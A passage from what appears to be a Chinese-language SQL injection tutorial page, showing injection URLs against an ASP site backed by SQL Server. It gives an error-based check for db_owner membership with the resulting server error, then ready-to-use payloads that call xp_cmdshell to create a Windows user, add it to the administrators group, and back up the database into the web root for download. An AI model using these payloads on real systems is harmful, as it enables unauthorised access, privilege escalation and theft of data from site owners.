测试当前用户是否为“db_owner”组成员。
article_show.asp?ID=(SELECT CHAR(115) %2B CAST(IS_MEMBER(''''db_owner'''') AS VARCHAR(2)))
Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07''''
[Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 ''''s1'''' 转换为数据类型为 int 的列时发生语法错误。
至此已经获取了许多有价值的信息。如果测试出当前用户为sysadmin组成员的话,有很大的可能性可以在这台SQL Server上运行cmd shell。如果是db_owner则可以对当前连接的数据库进行任意的操作,如新建表、删除表、插入数据、读取数据等等。
四、sysadmin权限的用户可进行的操作
注:以下不再详细介绍服务器的出错信息,只列出可用的SQL语句。
添加一个NT用户:
article_show.asp?ID=12;EXEC master..xp_cmdshell "net user name password /add"--
将该用户添加到administrators组
article_show.asp?ID=12;EXEC master..xp_cmdshell "net localgroup name administrators /add"--
将数据库做一个完整的备份放在网站目录下供下载:
article_show.asp?ID=12;BACKUP DATABASE 数据库名 to DISK=''''c:\Inetpub\wwwroot\1.db'''';--
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>
Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved. 闵涛 E_mail:admin@mintao.net(欢迎提供学习资源)
鄂公网安备 42011102001154号
站长:MinTao ICP备案号:鄂ICP备11006601号-18
注:本站部分文章源于互联网,版权归原作者所有!如有侵权,请原作者与本站联系,本站将立即删除! 本站文章除特别注明外均可转载,但需注明出处! [MinTao学以致用网] 
